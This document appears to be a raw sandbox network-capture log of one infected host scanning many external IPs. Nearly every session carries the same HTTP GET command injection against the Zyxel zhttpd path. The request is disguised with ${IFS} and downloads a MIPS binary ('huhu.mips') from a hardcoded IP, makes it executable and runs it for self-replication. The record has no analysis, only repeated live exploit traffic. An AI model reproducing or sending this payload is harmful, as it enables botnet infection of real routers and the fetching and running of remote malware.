                                                        Feb 2, 2024 06:20:27.495532990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        326192.168.2.145589438.52.173.116443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:27.495563030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        327192.168.2.1453244140.37.236.56443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:27.495583057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        328192.168.2.1458016184.98.169.166443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:27.495628119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        329192.168.2.143383096.167.120.59443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:27.495647907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        330192.168.2.144453065.193.16.209443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:27.495682001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        331192.168.2.143855840.84.185.121443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:27.495702028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        332192.168.2.1453862121.121.121.26443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:27.495748997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        333192.168.2.1450854123.223.200.238443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:27.495781898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        334192.168.2.1459654189.147.205.65443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:27.496112108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        335192.168.2.143525858.92.22.1443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:28.499015093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        336192.168.2.144372668.196.220.216443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:28.499054909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        337192.168.2.143359643.2.157.126443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:28.499078035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        338192.168.2.1436096135.28.9.170443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:28.499094963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        339192.168.2.1441586175.214.118.138443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:28.499129057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        340192.168.2.143907464.89.212.253443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:28.499167919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        341192.168.2.1449282165.70.26.31443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:28.499182940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        342192.168.2.145933487.57.189.95443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:28.499208927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        343192.168.2.145269075.230.45.196443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:28.499377012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        344192.168.2.1453050176.82.158.195443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:28.499388933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        345192.168.2.143556439.110.154.0443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:28.499388933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        346192.168.2.145745432.185.10.254443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:28.499448061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        347192.168.2.145947492.93.23.164443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:29.502471924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        348192.168.2.1443354185.137.75.99443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:29.502516031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        349192.168.2.145110470.217.12.23443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:29.502549887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        350192.168.2.1442488121.213.123.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:29.502578020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        351192.168.2.1453246107.251.65.18443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:29.502604961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        352192.168.2.145219645.59.117.127443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:29.502634048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        353192.168.2.1448432143.18.166.99443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:29.502671957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        354192.168.2.1452414196.105.217.100443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:29.502690077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        355192.168.2.1456148110.134.51.20443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:29.502964020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        356192.168.2.1435822112.123.163.192443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:29.503012896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        357192.168.2.1443556141.74.37.160443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:29.503047943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        358192.168.2.145822282.115.67.47443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:29.503067017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        359192.168.2.1459086139.85.62.75443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:29.503078938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        360192.168.2.1443042114.107.162.133443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:29.503113985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        361192.168.2.143401461.241.8.30443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:29.503159046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        362192.168.2.1451808149.121.111.17443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:29.503201962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        363192.168.2.1448702181.38.235.18443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:29.503216028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        364192.168.2.1435254132.76.159.19443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:29.503241062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        365192.168.2.1456742223.46.206.150443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:29.503362894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        366192.168.2.1435302194.94.109.72443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:29.503391981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        367192.168.2.145178074.85.4.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:30.506525040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        368192.168.2.144383476.191.207.190443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:30.506556988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        369192.168.2.1443368188.137.236.74443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:30.506582975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        370192.168.2.1441814207.204.55.65443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:30.506601095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        371192.168.2.1456810194.132.118.229443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:30.506632090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        372192.168.2.1455464147.145.218.106443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:30.506654978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        373192.168.2.1446936165.29.22.162443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:30.506675005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        374192.168.2.143394657.74.91.173443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:30.506699085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        375192.168.2.144211658.50.201.104443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:30.506833076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        376192.168.2.143987265.232.104.197443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:30.506860018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        377192.168.2.1451716144.118.216.131443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:30.506911039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        378192.168.2.1433534211.156.91.98443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:31.510632038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        379192.168.2.1453560190.210.220.17443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:31.510669947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        380192.168.2.1448594168.226.241.167443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:31.510680914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        381192.168.2.1450768193.158.132.32443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:31.510741949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        382192.168.2.1454450218.182.149.70443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:31.510785103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        383192.168.2.145529098.179.182.236443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:31.510797977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        384192.168.2.1448814202.15.85.232443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:31.510924101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        385192.168.2.14446209.197.64.235443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:31.510981083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        386192.168.2.1434422148.170.47.98443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:32.514684916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        387192.168.2.145206474.237.66.160443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:32.514734030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        388192.168.2.1454510203.222.209.63443
                                                        TimestampBytes transferredDirectionData
